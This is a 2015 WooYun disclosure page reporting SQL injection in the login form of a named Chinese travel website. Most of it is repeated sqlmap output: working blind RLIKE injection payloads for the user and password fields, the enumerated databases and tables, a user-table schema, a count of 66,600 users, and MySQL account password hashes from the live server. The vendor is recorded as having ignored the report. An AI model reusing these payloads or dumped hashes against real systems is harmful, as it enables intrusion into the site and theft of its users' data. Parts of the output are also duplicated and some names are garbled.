当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114029

漏洞标题:广州市特网网络科技有限公司SQL注入(POST)2#

相关厂商:广州市特网网络科技有限公司

漏洞作者: hh2014

提交时间:2015-05-14 14:26

修复时间:2015-06-28 14:28

公开时间:2015-06-28 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

http://www.niuhuhu.com/user/login


post参数

user=*&password=*&back=


user和password两个参数都存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'travel_schema'
available databases [11]:
[*] _Travel
[*] dedecmsv57gbksp1
[*] dedecmsv57utf8sp1
[*] information_schema
[*] mysql
[*] temp
[*] test
[*] Tewang
[*] travel_schema
[*] waa
[*] zhengjie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user: 'root@localhost'
database management system users password hashes:
[*] 14site [1]:
password hash: *EA263CB550205B4245A14D4DC212AD82315684CF
[*] 5booking_com [1]:
password hash: *5C493E7F9411A817A59404A60AC99D1E53CA8DD2
[*] 99sleep_com [1]:
password hash: *EBB48B85A4B11A91BB79145AEE97F3F629202372
[*] c185 [1]:
password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] c185_com [1]:
password hash: *2F00E66655D9676B4B96309BC264ED939D408E30
[*] dedecmsv57gbksp1 [1]:
password hash: *031352AD799E791B288880650C9ACC7BEDEABBBA
[*] fair020_com [1]:
password hash: *E2855AB82665B9548026F7D1C6E490AF3360712B
[*] gbqs_c185_com [1]:
password hash: *C03B343D4E2E5294B49B0DB4FDA74D819C88AD42
[*] guest [1]:
password hash: *E331263D8F7DE6B5EFD787A7BC2E55984F55BEB5
[*] niunu_com [1]:
password hash: *00044DCC7E037279C7EEC4DD363D9E988BFF6F3D
[*] qqhotel [1]:
password hash: *540244A0C16792D36E5D8C6AD395F8F5DCE/82A9
[*] root [1]:
password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] yunjiankong [1]:
password hash: *67CCB3E4C7D082F59E21B16E36C6655A938EBABE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
[107 tables]
+--------------------------+
| Tkds |
| _ly_hotel |
| _new_hotel |
| expo_industr |
| hotel_order_2(11 |
| user\\feedback |
| user |
| car_rental_brands |
| car_rental_cars |
| car_rental_orders |
| car_rental_suppliers |
| car_rentals |
| expo |
| expo_hall |
| flight_aircraft_models |
| flight_airhines |
| flight_airports |
| flight_orders |
| flight_timetables |
| hotel |
| hotel_addition |
| hotel_aware |
| hotel_by |
| hotel_card |
| hotel_chain |
| hotel_comment |
| hotel_config |
| hotel_cpc |
| hotel_cpc2 |
| hotel_cpc_online |
| hotel_distance |
| hotel_facility |
| hotel_offline |
| hotel_option |
| hotel_order |
| hotel_order2 |
| hotel_orderX2012 |
| hotel_order_201408131112 |
| hotel_peer |
| hotel_picture |
| hotel_room |
| hotel_room_cache |
| hotel_room_elong |
| hotel_room_names |
| hotel_room_travelsky |
| hotel_room_type |
| hotel_themes |
| hotel_tip |
| hotel_train |
| hotelordersms |
| link |
| location |
| location2 |
| location_airport |
| location_by |
| location_city |
| location_district |
| location_division |
| location_picture |
| location_province |
| location_school |
| location_subway |
| location_type |
| locationofhotels |
| locations |
| locationtopic |
| ly_city |
| ly_hotel |
| ly_hotel_est |
| ly_hotel_id |
| ly_hotel_image |
| manage |
| manage_config |
| manage_file |
| manage_level |
| manage_limits |
| management_limits |
| managements |
| master_limits |
| masters |
| new_hotel |
| new_hotel_image |
| new_hotel_room |
| news |
| news_comment |
| news_tag |
| notices |
| scenic |
| sigfts |
| sight_orders |
| sight_pictures |
| sight_subjects |
| sight_tickets |
| site |
| train_station |
| user_bonus_urges |
| user_bonuses |
| user_exchange |
| user_exchange_coods |
| user_extraction_bonus |
| user_integral |
| user_surveys |
| visa_countrys |
| visa_orders |
| visa_require |
| visa_types |
| visas |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column |
+------------------------+
| _id | int(11) |
| u^is-emailverify |
| u_emailverify-code | varchar(255) |
| u_emailverify-lasttime | varchar(255) |
| u_id-site | int(11) |
| u_integral-already | int(11) |
| u_integral-deduct | int(11) |
| u_integral-superfluity | int(11) |
| u_inter-check | int(11) |
| u_inter-noshow | int(11) |
| u_name-full | varchar(100) |
| u_time-insert | timestamp |
| u_time-sign | varchar(500) |
| u_time-update | timestamp |
| uPintegral-check |
| uPintegral-noshow |
| u_address | varchar(500) |
| u_avatar | varchar(255) |
| u_fax | varcgar(100) |
| u_id | int(10) unsigned |
| u_integral | int(11) |
| u_inter | int(11) |
| u_last_login_ip | varchar(200) |
| u_level | int(11) |
| u_mail | varchar(100) |
| u_name | varchar(255) |
| u_nick_name | varchar(255) |
| u_phone | varchar(100) |
| u_sex | varchar(50) |
| u_site | varchar(255) |
| u_tel | varchar(100) |
| uXpassword |
+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column |
+------------------------+
| _id | int(11) |
| u^is-emailverify |
| u_emailverify-code | varchar(255) |
| u_emailverify-lasttime | varchar(255) |
| u_id-site | int(11) |
| u_integral-already | int(11) |
| u_integral-deduct | int(11) |
| u_integral-superfluity | int(11) |
| u_inter-check | int(11) |
| u_inter-noshow | int(11) |
| u_name-full | varchar(100) |
| u_time-insert | timestamp |
| u_time-sign | varchar(500) |
| u_time-update | timestamp |
| uPintegral-check |
| uPintegral-noshow |
| u_address | varchar(500) |
| u_avatar | varchar(255) |
| u_fax | varcgar(100) |
| u_id | int(10) unsigned |
| u_integral | int(11) |
| u_inter | int(11) |
| u_last_login_ip | varchar(200) |
| u_level | int(11) |
| u_mail | varchar(100) |
| u_name | varchar(255) |
| u_nick_name | varchar(255) |
| u_phone | varchar(100) |
| u_sex | varchar(50) |
| u_site | varchar(255) |
| u_tel | varchar(100) |
| uXpassword |
+------------------------+
select count(u_name) from user: '66600''


就不深入了,hotel_order表,包含大量用户订单信息

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'travel_schema'
available databases [11]:
[*] _Travel
[*] dedecmsv57gbksp1
[*] dedecmsv57utf8sp1
[*] information_schema
[*] mysql
[*] temp
[*] test
[*] Tewang
[*] travel_schema
[*] waa
[*] zhengjie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user: 'root@localhost'
database management system users password hashes:
[*] 14site [1]:
password hash: *EA263CB550205B4245A14D4DC212AD82315684CF
[*] 5booking_com [1]:
password hash: *5C493E7F9411A817A59404A60AC99D1E53CA8DD2
[*] 99sleep_com [1]:
password hash: *EBB48B85A4B11A91BB79145AEE97F3F629202372
[*] c185 [1]:
password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] c185_com [1]:
password hash: *2F00E66655D9676B4B96309BC264ED939D408E30
[*] dedecmsv57gbksp1 [1]:
password hash: *031352AD799E791B288880650C9ACC7BEDEABBBA
[*] fair020_com [1]:
password hash: *E2855AB82665B9548026F7D1C6E490AF3360712B
[*] gbqs_c185_com [1]:
password hash: *C03B343D4E2E5294B49B0DB4FDA74D819C88AD42
[*] guest [1]:
password hash: *E331263D8F7DE6B5EFD787A7BC2E55984F55BEB5
[*] niunu_com [1]:
password hash: *00044DCC7E037279C7EEC4DD363D9E988BFF6F3D
[*] qqhotel [1]:
password hash: *540244A0C16792D36E5D8C6AD395F8F5DCE/82A9
[*] root [1]:
password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] yunjiankong [1]:
password hash: *67CCB3E4C7D082F59E21B16E36C6655A938EBABE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
[107 tables]
+--------------------------+
| Tkds |
| _ly_hotel |
| _new_hotel |
| expo_industr |
| hotel_order_2(11 |
| user\\feedback |
| user |
| car_rental_brands |
| car_rental_cars |
| car_rental_orders |
| car_rental_suppliers |
| car_rentals |
| expo |
| expo_hall |
| flight_aircraft_models |
| flight_airhines |
| flight_airports |
| flight_orders |
| flight_timetables |
| hotel |
| hotel_addition |
| hotel_aware |
| hotel_by |
| hotel_card |
| hotel_chain |
| hotel_comment |
| hotel_config |
| hotel_cpc |
| hotel_cpc2 |
| hotel_cpc_online |
| hotel_distance |
| hotel_facility |
| hotel_offline |
| hotel_option |
| hotel_order |
| hotel_order2 |
| hotel_orderX2012 |
| hotel_order_201408131112 |
| hotel_peer |
| hotel_picture |
| hotel_room |
| hotel_room_cache |
| hotel_room_elong |
| hotel_room_names |
| hotel_room_travelsky |
| hotel_room_type |
| hotel_themes |
| hotel_tip |
| hotel_train |
| hotelordersms |
| link |
| location |
| location2 |
| location_airport |
| location_by |
| location_city |
| location_district |
| location_division |
| location_picture |
| location_province |
| location_school |
| location_subway |
| location_type |
| locationofhotels |
| locations |
| locationtopic |
| ly_city |
| ly_hotel |
| ly_hotel_est |
| ly_hotel_id |
| ly_hotel_image |
| manage |
| manage_config |
| manage_file |
| manage_level |
| manage_limits |
| management_limits |
| managements |
| master_limits |
| masters |
| new_hotel |
| new_hotel_image |
| new_hotel_room |
| news |
| news_comment |
| news_tag |
| notices |
| scenic |
| sigfts |
| sight_orders |
| sight_pictures |
| sight_subjects |
| sight_tickets |
| site |
| train_station |
| user_bonus_urges |
| user_bonuses |
| user_exchange |
| user_exchange_coods |
| user_extraction_bonus |
| user_integral |
| user_surveys |
| visa_countrys |
| visa_orders |
| visa_require |
| visa_types |
| visas |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column |
+------------------------+
| _id | int(11) |
| u^is-emailverify |
| u_emailverify-code | varchar(255) |
| u_emailverify-lasttime | varchar(255) |
| u_id-site | int(11) |
| u_integral-already | int(11) |
| u_integral-deduct | int(11) |
| u_integral-superfluity | int(11) |
| u_inter-check | int(11) |
| u_inter-noshow | int(11) |
| u_name-full | varchar(100) |
| u_time-insert | timestamp |
| u_time-sign | varchar(500) |
| u_time-update | timestamp |
| uPintegral-check |
| uPintegral-noshow |
| u_address | varchar(500) |
| u_avatar | varchar(255) |
| u_fax | varcgar(100) |
| u_id | int(10) unsigned |
| u_integral | int(11) |
| u_inter | int(11) |
| u_last_login_ip | varchar(200) |
| u_level | int(11) |
| u_mail | varchar(100) |
| u_name | varchar(255) |
| u_nick_name | varchar(255) |
| u_phone | varchar(100) |
| u_sex | varchar(50) |
| u_site | varchar(255) |
| u_tel | varchar(100) |
| uXpassword |
+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column |
+------------------------+
| _id | int(11) |
| u^is-emailverify |
| u_emailverify-code | varchar(255) |
| u_emailverify-lasttime | varchar(255) |
| u_id-site | int(11) |
| u_integral-already | int(11) |
| u_integral-deduct | int(11) |
| u_integral-superfluity | int(11) |
| u_inter-check | int(11) |
| u_inter-noshow | int(11) |
| u_name-full | varchar(100) |
| u_time-insert | timestamp |
| u_time-sign | varchar(500) |
| u_time-update | timestamp |
| uPintegral-check |
| uPintegral-noshow |
| u_address | varchar(500) |
| u_avatar | varchar(255) |
| u_fax | varcgar(100) |
| u_id | int(10) unsigned |
| u_integral | int(11) |
| u_inter | int(11) |
| u_last_login_ip | varchar(200) |
| u_level | int(11) |
| u_mail | varchar(100) |
| u_name | varchar(255) |
| u_nick_name | varchar(255) |
| u_phone | varchar(100) |
| u_sex | varchar(50) |
| u_site | varchar(255) |
| u_tel | varchar(100) |
| uXpassword |
+------------------------+
select count(u_name) from user: '66600'

修复方案:

参数过滤

版权声明:转载请注明来源 hh2014@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论